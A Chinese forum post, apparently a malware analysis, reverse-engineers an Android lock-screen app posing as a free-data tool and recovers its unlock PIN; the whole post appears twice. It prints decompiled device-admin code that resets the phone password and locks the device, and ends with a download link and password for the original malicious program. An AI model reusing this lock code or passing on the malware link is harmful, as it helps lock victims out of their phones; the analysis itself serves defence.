对锁机app【云免破解版】的逆向分析
应管理建议先上锁机图,还有声音,非常可恶。
大家不要轻信什么免流刷赞之类的东西,软件打开都会申请权限,一定要看清楚再选择.好了,我们打开软件看到,选择拒绝三次之后进入软件界面,注册登录发现啥都没有。允许的小伙伴已经被锁机了。
我们打开程序首先就是问我们要权限,发现在e.smile里面,
给了su权限就把data.txt放进系统里面,我们猜想这个data.txt就是真正的锁机成序。
压缩软件打开看一下,果然是锁机程序
接下来重命名data.apk反编译分析一下代码.在入口看到
看一下myadmin.class的代码
[Asm] 纯文本查看 复制代码
?
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
package com.cjk;
import android.app.admin.DeviceAdminReceiver;
import android.app.admin.DevicePolicyManager;
import android.content.Context;
import android.content.Intent;
import android.util.Log;
public class MyAdmin
extends DeviceAdminReceiver
{
String QQ群号571012706 = "ATMyMDN1YzN4kjealXW4h1dXZnV1VFdUN3UyJVcRBHUv9kbO1WTsx0aLpmSplEaId2RmZUZFRGRjNkYCFWQ";
String pin = DU.getsss(this.QQ群号571012706);
String 三生石畔 = new StringBuffer().append(new StringBuffer().append(this.彼).append(this.岸).toString()).append(this.花).toString() + this.开;
String 岸 = (String)this.pin.subSequence(1, 2);
String 开 = (String)this.pin.subSequence(21, 22);
String 彼 = (String)this.pin.subSequence(2, 3);
String 花 = (String)this.pin.subSequence(14, 15);
@Override
public CharSequence onDisableRequested(Context paramContext, Intent paramIntent)
{
getManager(paramContext).lockNow();
getManager(paramContext).resetPassword(this.三生石畔, 0);
return super.onDisableRequested(paramContext, paramIntent);
}
@Override
public void onEnabled(Context paramContext, Intent paramIntent)
{
try
{
Object localObject = Class.forName("com.cjk.s");
localObject = new Intent(paramContext, (Class)localObject);
((Intent)localObject).setFlags(268435456);
paramContext.startService((Intent)localObject);
getManager(paramContext).resetPassword(this.三生石畔, 0);
super.onEnabled(paramContext, paramIntent);
return;
}
catch (ClassNotFoundException paramContext)
{
throw new NoClassDefFoundError(paramContext.getMessage());
}
}
@Override
public void onPasswordChanged(Context paramContext, Intent paramIntent)
{
getManager(paramContext).lockNow();
getManager(paramContext).resetPassword(this.三生石畔, 0);
super.onPasswordChanged(paramContext, paramIntent);
}
@Override
public void onReceive(Context paramContext, Intent paramIntent)
{
Log.i("------", "onReceive-----");
super.onReceive(paramContext, paramIntent);
}
}
重置的密码也就是三生石畔的值。
所以我们只要得到三生石畔的赋值就好了,我们到java中打印一下
这就得到了锁机密码。他这里调用了一个DU.getsss的函数,this.三生石畔 = stringBuffer.append(stringBuffer2.append(stringBuffer3.append(this.彼).append(this.岸).toString()).append(this.花).toString()).append(this.开).toString();锁机模拟器上再装一下data.apk就会显示输入pin界面,实测手机重启就可以了。
作者有点小狡猾,我们重启输入BaHk,就顺利开机了,卸载掉锁机就可以了
附上源程序链接:http://pan.baidu.com/s/1i5bOXYd 密码:haiw
大家不要轻信什么免流刷赞之类的东西,软件打开都会申请权限,一定要看清楚再选择.好了,我们打开软件看到,选择拒绝三次之后进入软件界面,注册登录发现啥都没有。允许的小伙伴已经被锁机了。
我们打开程序首先就是问我们要权限,发现在e.smile里面,
给了su权限就把data.txt放进系统里面,我们猜想这个data.txt就是真正的锁机成序。
压缩软件打开看一下,果然是锁机程序
接下来重命名data.apk反编译分析一下代码.在入口看到
看一下myadmin.class的代码
[Asm] 纯文本查看 复制代码
?
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
package com.cjk;
import android.app.admin.DeviceAdminReceiver;
import android.app.admin.DevicePolicyManager;
import android.content.Context;
import android.content.Intent;
import android.util.Log;
public class MyAdmin
extends DeviceAdminReceiver
{
String QQ群号571012706 = "ATMyMDN1YzN4kjealXW4h1dXZnV1VFdUN3UyJVcRBHUv9kbO1WTsx0aLpmSplEaId2RmZUZFRGRjNkYCFWQ";
String pin = DU.getsss(this.QQ群号571012706);
String 三生石畔 = new StringBuffer().append(new StringBuffer().append(this.彼).append(this.岸).toString()).append(this.花).toString() + this.开;
String 岸 = (String)this.pin.subSequence(1, 2);
String 开 = (String)this.pin.subSequence(21, 22);
String 彼 = (String)this.pin.subSequence(2, 3);
String 花 = (String)this.pin.subSequence(14, 15);
@Override
public CharSequence onDisableRequested(Context paramContext, Intent paramIntent)
{
getManager(paramContext).lockNow();
getManager(paramContext).resetPassword(this.三生石畔, 0);
return super.onDisableRequested(paramContext, paramIntent);
}
@Override
public void onEnabled(Context paramContext, Intent paramIntent)
{
try
{
Object localObject = Class.forName("com.cjk.s");
localObject = new Intent(paramContext, (Class)localObject);
((Intent)localObject).setFlags(268435456);
paramContext.startService((Intent)localObject);
getManager(paramContext).resetPassword(this.三生石畔, 0);
super.onEnabled(paramContext, paramIntent);
return;
}
catch (ClassNotFoundException paramContext)
{
throw new NoClassDefFoundError(paramContext.getMessage());
}
}
@Override
public void onPasswordChanged(Context paramContext, Intent paramIntent)
{
getManager(paramContext).lockNow();
getManager(paramContext).resetPassword(this.三生石畔, 0);
super.onPasswordChanged(paramContext, paramIntent);
}
@Override
public void onReceive(Context paramContext, Intent paramIntent)
{
Log.i("------", "onReceive-----");
super.onReceive(paramContext, paramIntent);
}
}
重置的密码也就是三生石畔的值。
所以我们只要得到三生石畔的赋值就好了,我们到java中打印一下
这就得到了锁机密码。他这里调用了一个DU.getsss的函数,this.三生石畔 = stringBuffer.append(stringBuffer2.append(stringBuffer3.append(this.彼).append(this.岸).toString()).append(this.花).toString()).append(this.开).toString();锁机模拟器上再装一下data.apk就会显示输入pin界面,实测手机重启就可以了。
作者有点小狡猾,我们重启输入BaHk,就顺利开机了,卸载掉锁机就可以了
附上源程序链接:http://pan.baidu.com/s/1i5bOXYd 密码:haiw